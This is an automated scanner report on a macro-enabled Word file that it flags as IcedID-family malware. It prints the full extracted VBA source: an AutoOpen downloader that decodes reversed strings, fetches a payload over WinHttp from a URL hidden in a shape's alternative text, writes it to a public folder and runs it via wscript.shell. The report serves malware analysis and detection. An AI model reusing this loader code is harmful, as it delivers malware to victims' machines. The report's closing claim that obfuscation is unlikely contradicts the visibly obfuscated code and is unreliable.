Verdict: MALICIOUS
Risk Score: 290
Heuristics: 7
- ClamAV: Doc.Macro.ICEID1020-9781212-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0.
- VBA project inside OOXML (medium, OOXML_VBA, 4 related findings). Document contains a VBA project (VBA macros present).
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `SuSHO(SwWmd + "." + "shell").exec (QgDuh)`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set ZXGEu = VBA.CreateObject(jYTqM + "" + EvyDN)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts: 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14199 bytes | baa35d93d43267058f19e3f81fa5d0e05d4d56b0d90767840f4d30d6098a24e9 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ORoCg"
Sub FqblH(IZnEv, Optional ByVal gvzBE As String = "c:\users\public\wskMa.txt", Optional ByVal EvyDN As String = "systemobject")
' Wending macron alines canaan squirm
' Metalanguage allergen inconsiderately
' Militarily tenet phlegmatically
' Forbears stinkers overeating
' Leaped
' Attitude
' Inexplicable
' Protectorates spain agakhan earwigs dictions
' Competes sinusitis prostates forthcoming
' Placentas publish bumptious pontificating climatic scuffed dumpy arabesques
' Equestrian postlude
' Illustrative
' Worst edginess zion
' Cain senators fastnesses arranging
' Troikas
' Endues harassed spied
' Misrepresentations earache virile
' Foreshores nightfall week sneaking primitiveness exploratory
' Monopolisation
' Bodes blunders patronesses christenings
' Ease intrauterine prohibited neural
' Deftness hillman graciousness mullioned
' Bolero aspirated lumber
' Shavings contains cells refusal
' Leisure lumping particularised dies
' Subfamily pairs
' Gossips clamoured crystallise
Set ZXGEu = VBA.CreateObject(jYTqM + "" + EvyDN)
' Math offcut interconnections
' Partitions illiberal unpretending ensuring
' Cuts
' Junta tory etchings inhuman
Set hHQnU = ZXGEu.CreateTextFile(gvzBE)
' Tablespoonfuls flowerpots dip
' Chunnel
' Lamed shoemakers nougats
' Unimpeachable scriptorium
' Uprating muff metal overhear helpings lumbers
hHQnU.WriteLine IZnEv
' Linguistics trumpeted
' Eviction settees
' Visible amending unrequited overcharged
' Obituaries atropine roughage replicable
' Indomitable
' Trepidations overlapping impersonated
hHQnU.Close
' Equitably extinct bicarbonate forewarn
' Freshening unsensational
' Extracting prostrates
' Arbiter jailers bobbed stalled perioperative tools
' Theme femininity
' Wheaten
' Rotators lyon refreshments demerit patronage elms
' Nicotine brokenly
' Cannibal delve eyeglasses drifted encyclopaedia
' Idle decrypted sketchbooks
' Wingers filial alternations
' Municipalities hourglass literatures
' Unblinkingly specious
' Circulates
' Ungrateful abase barricaded respecting sort
' Doubled
' Nominations guest indignantly
' Offered permuted stabilises washings
' Enjoin psalm quacks worthier
' Adsorbed homesteads musts bradawl
' Mayor durable unaffectedly loading emanation
' Alliterated
' Metronomic lamplight veg circumventing corporal
' Girlie thirstiest mara
' Keypads
' Commodore stonework utilise
' Lessee wrecks fanaticism twinkling
' Hypothesis structures keening dugouts
' Records tomb
' Blessings anagrams awful
' Tacitly similarity breasting mausoleum circularity
' Quarried chance deface
' Surveyor
' Battleground entertainers fundraising topped libyans
' Weaned
' Windswept ways chained dissect ides
' Brasserie browse
' Architecture bubble adroitly cinematic ophthalmologists backchat
' Hesitating corroborated
' Uncharged bunions
End Sub
' Unfirm backstairs eyelash
' Agendas muzzling maladjustment
' Schizophrenia
' Shamefaced ethnicity daily
Sub AutoOpen()
' Ranting
' Regionally design guardsman
' Schistosomiasis laryngitis
' Leaner
' Erection condescended
' Randomisation sensationally renewals mothered greatgrandmother
' Bombarded proverb
' Basque rang guidebooks pollster
' Freeforall
' Coxes scarily banana redo
' Thither
' Undesirably binomial kilometres uranus
' Smartened pirouetted criticised misconceived encomium
' Lawn laurels
' Boroughs turkey nonexistent
' Obsequious
' Taverns selflessly
' Limerick velvety
' Boycotted mystification exmembers exacerbates recurrent
' Windscreens
' Indigestible garrotte launch windmills
' Gully tormented sporadically percuss
' Aloofness duckling
' Fumigate reproduction nearer
' Disentangle peruvian implied
' Heartburn brightly monotony wolfwhistles cannery volunteer
' Quarried wagon of
Dim SnHhN As New jhXil
' Aspic wounded generosity
' Mischiefmakers labouring
' Daddy septicaemia mews routing bored workless
' Telltale thawed bankrupts
' Lazed slowdown doomed
' Seer
hXgDj = ""
' Attritional intermission
' Immensity tripoli spawned eversion
' Dishonest roomy encode postures chuckles elasticities
' Technocracy
' Jades deriders restyled acquisitiveness
' Glim etherised dissident reassessment
' Aphorist autocracies recoiling unravels bogeys vomiting tripwire
' Extrusion terrorism
' Urbanised
' Grammes solves pots rectums tapestry
IZnEv = SnHhN.QzgNW(IuSRt)
' Firefighting disingenuously
' Grovel bicentenary
' Nuptial imam
' Dirties
' Agar humblest ratifies
' Lash railing ajar proofreading
FqblH pLFNZ(IZnEv)
' Recombines reconstitute stratosphere
' Unionists endive
' Chairmanship
' Dinky microbe
' Percolate tunisian blaring anniversary capitalisation
' Amputations leveraged bagpipe
' Recuperation inertial bartering improbability
' Glycerol
' Bunker thenceforth
' Delimited puking simplest chance
' Piercer referee
' Twins evasively ambiguous
' Contra armrest
rynzL KyPVo(0) + "vr32 c:\users\public\wskMa.txt", "wscript"
End Sub
Function QSszr(iupob, htyEl)
' Unaccountable monsoons dualistic
' Entrapping soloists conglomeration
' Wiped isolators
' Divisions scantiest
' Involves placenta romany housekeeper wise wallets
QSszr = Split(iupob, htyEl)
End Function
Attribute VB_Name = "psVWp"
' Constructable unkept impregnating
' Brainpower clips recounting
' Abutment
' Bandwagon sieve consummated tortured escapees curtsying ordinands
Function pLFNZ(ztcAN)
' Tiptoeing ground
' Interrelatedness sneezed freakish carabinieri
' Elongation superstitiously scout tyrannies
' Gyroscopes aggressively hostess
' Tactics
pLFNZ = StrConv(ztcAN, vbUnicode)
' Openness birthplace lectured imperium
' Punctuation lance lefts
' Deism elided
' Ratatouille singularities
' Dignified redone manned
' Ingeniously consisting hydrothermal neuroscience unceremoniously
End Function
' Applicants
' Contraventions polyphonic
' Wretchedness utopias louvre lakeside
' Redistributing gum abysmal
Function rbmfg()
' Departmental devotion stretch quaked
' Tragedians runnersup nine plantation blacks
' Sociably hadrons gatekeeper preoccupations
' Psychoanalysis penitent
' Oppression
' Hew skittishness deceitfulness
' Fatal
' Obviating stokes
' Piazzas sighed remark ratrace softest
' Pelican amplifier
' Foyers cosseted
' Metropolitan
With ActiveDocument.shapes(1)
rbmfg = .AlternativeText
End With
End Function
' Speculating pagan annoying dispenser scrolling baklavas grafted
' Gawking lending boastfully
' Bronchi dads expedited
' Stargazing
' Certifiable
' Equinoctial garaged responses
' Batiks letterpress democratising cohabiting dynasts
Function KyPVo(jvkWk)
' Enquiringly kilo jagged humpback
' Repayable ameliorates misspellings
' Unauthenticated locks
' Commodity alludes underpricing sheathing restates
' Plaque offenders
' Traducer success abstractedly
' Demists commending
' Horridly
DbRCf = QSszr(rbmfg(), "~~~")
WtUBm = DbRCf(jvkWk)
KyPVo = WtUBm
End Function
Attribute VB_Name = "jhXil"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function DoTnM(qtOOS)
' Nightmarish sharpened soapy quoter
' Muggy authentically
' Sirloin handlebar
' Lunged
' Prelates anywhere biblically unbridged
' Abundantly clones ethylene gimmickry unelectable phobias
' Stratigraphic petting
' Idealist subcontract bandits perpetuation
' Adhesion sauce initialisation
' Watertable doc
' Fronted fitted
' Discontinued
' Slights shouter confectionery
KhZYo = qtOOS
HxvWc = Len(KhZYo)
For LWvXt = 0 To HxvWc - 1
' Miscalculate
' Floppiest dementia communicated inlets upon
' Virgil cupping communal ribaldry
' Mouthpiece
' Buoyed skein naomi
' Honesty outpointed expressive
' Realigning stagnating humanise gaits
' Comrade recess kidneyshaped
' Wretchedness dulled downbeat unpalatable glides spectroscopes exude
' Ammonia defrauding resizing squeals
' Parities upland internals toyed prove
' Cartwheel brutalities alluvia disputing tweeter retransmitting imitator
' Choppy trefoil tame torts
' Overbearing naturalised
' Withdrawals tidings diagrams reorientates reprogramme
' Reference bewail
' Declarative
' Hires
' Curing pawpaw dropping nooses
ugdIW = ugdIW & Mid(KhZYo, (HxvWc - LWvXt), 1)
Next LWvXt
' Benediction pancakes collegiate
' Authorities waive
' Streakier sawyer tinged maternity
' Certificated
' Cannily operatic hydroelectricity hillock
' Wended manfully
DoTnM = ugdIW
End Function
' Impracticalities contributing havoc petrochemicals quilting
' Carter acetone techniques allowances
' Brush scurries filter
' Icicles denying snooze sued brake
' Congruence sensibility beehives everlasting
Function QzgNW(DwSqO)
' Purging libations seemly
' Fundamental kilovolt
' Indoctrinations ablutions ices
' Delightedly introverts rapiers outlying invited
' Uncontrollable wireless premiere redundancy
' Unpublicised professes mortified whacked
Dim WrLMu As Object
' English victim budding
' Tensional previewed
' Bedpan untasted evaporator
' Assuage heckled unassailable
' Sapphires impedimenta indaba glitters decorated
' Bodybuilding thermal permanent diminishing municipalities
' Orient pluralistic
' Crosscheck straits ranis nurseryman
' Disclaims maturity plumbers include extensively
' Homogeneous fixated imperially guesswork
' Attendees visage
' Olympics slabs mystically condescendingly commandingly invariable
' Ascendency citruses wriggled alarmed
Set WrLMu = CreateObject(DoTnM(DwSqO) + "." + DoTnM(DwSqO) + "Request.5.1")
' Mainstream citation
' Bargepole flickers insurmountably
' Treasury giantism recalcitrance reliving
' Wideness faller bridleway cabinets valleys tonne
' Spectacles
' Resizing extrinsically retread
' Choristers profounder oxidants uncivil
' Underrate franchisor decant aching
' Enroute yeomanry fatten constant insecurely songsters diaconal
' Surreptitious prospectors octahedron treatable scrape
' Phytoplankton taints senhor stridently unequivocal
' Intangible remote malignantly
' Roarer pretence
' Speedier accommodating todies programme tenths
' Headroom
' Deceives
' Sunflower
' Quibbles
' Component flamboyant finances groaner pelicans underplay
' Hardening muscling uncollected sturdy
dJUre = KyPVo(1)
' Slurps defined commandeered deadon
' Wade dumped
' Personalised stimulating
' Engage plaza
' Spurning imperfectly proliferating
' Dangerousness unwrapping trustees towing
WrLMu.Open "GET", DoTnM(dJUre), False
' Administrated gymnasia
' Polymorphic birch disconnected riper
' Boisterous delegated
' Perfection forgoing diviner shiver trampling
' Tomorrow transform cocksure
' Modularise greetings vaults
' Alaska relations atropine grouses
WrLMu.Send
' Emissivity tastiest anatomy
' Meanie redecoration scoutmaster
' Rebellion cirrhotic sheepdogs jungle
' Infield ransacking
' Earphones cooking peseta anachronism
QzgNW = WrLMu.responsebody
End Function
Attribute VB_Name = "TBOXo"
Public Const IuSRt As String = "ptthniw"
Public Const jYTqM As String = "scripting.file"
Function SuSHO(FCQWk)
Set SuSHO = CreateObject(FCQWk)
End Function
Sub rynzL(QgDuh, SwWmd)
' Splintered tireless
' Modernisations shorn whinnying assertively
' Symbolists pottage unissued
' Appendicitis
' Antimatter barcode beans partake revaluations plucks
' Outbred cobwebby await
' Scone planned ravings stations theatricals
' Jersey secrete infrequency mallets bijoux forebrain
' Fornicate
' Followed tautologies pen
' Vertebrates wade semicircular missiles bladders braggart smothered
' Brethren interrogators shuttling quit fuzz
' Quarrelsome bricabrac abraham expanses gab
' Epitomises insufferably belfast turntable homogeneity
' Testimonies drifters
' Adverts noddy earholes
' Carcases bequeathed
' Unmannerly bathers expedition
' Poltergeist scooter duration rounds fervid
' Horsewhipped snipped assignation earthwards
' Lavatory carboniferous
' Voluminous porkchop
' Biosphere
' Concentric
' Mellifluous morose vicarages pyrotechnic
' Preening parapets
' Fundamental toil
SuSHO(SwWmd + "." + "shell").exec (QgDuh)
' Blamelessly postponement regrow
' Subjugated giantess shadeless elephantine needy
' Uncancelled grunt kindred
' Adulterate encyclopedias basin
' Exhumed subjective bagpiper karakul consorted
' Jittery judaic
' Unobservable aptitudes
' Handedness archdeacon weaved
' Trays teeth diffuse
' Failure northward
' Elysee oestrogens
' Footstool kennedy literals
' Obsesses billows ornately obstacles curvilinear
' Yolk
' Dissuade gloated maples reel
' Arabesques serialisations
' Nought hunt struts cosine mime
' Lascivious solvency splinters
' Materials suzerainty carapace schizophrenic
' Provisionally prance labs crusaded
' Lebensraum
' Condescending rescuers cads putted poliomyelitis indemnify
' Lauders overlay rescanning incriminates esthete
' Glens lushness debtors derisory aborigines
' Openminded intones reserves muscular frolics
' Teamed infrequently
' Outlasted
' Inshore foreland roomy unities legitimise
' Adaptive unwontedly funded smash
' Infractions evacuation unthinking
' Skewness wellintentioned subtitle
' Feature titling drape desktop uhuh emaciated
' Premised boreal lays
' Overshot
' Headlining values
' Grasslands
' Keeling domes
' Beginner deployed geysers
' Braying forgets
' Figural petition bromine accusing cracks
' Picker pinions perversely
' Walkabout basing executions grenadier
' Optical acquitting
' Shallots rouses shambled
' Blacklisted chaffing preambles loyalties congregation
' Undulate meditates tacit deity wreaks bigben remember
End Sub
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes | 4f4f415bf06d57b0046d628a655b0e15eb547db3ac9b8bcc6679c8cc46a861c7 |

Detection
- ClamAV: Doc.Macro.ICEID1020-9781212-0
- Obfuscation or payload: unlikely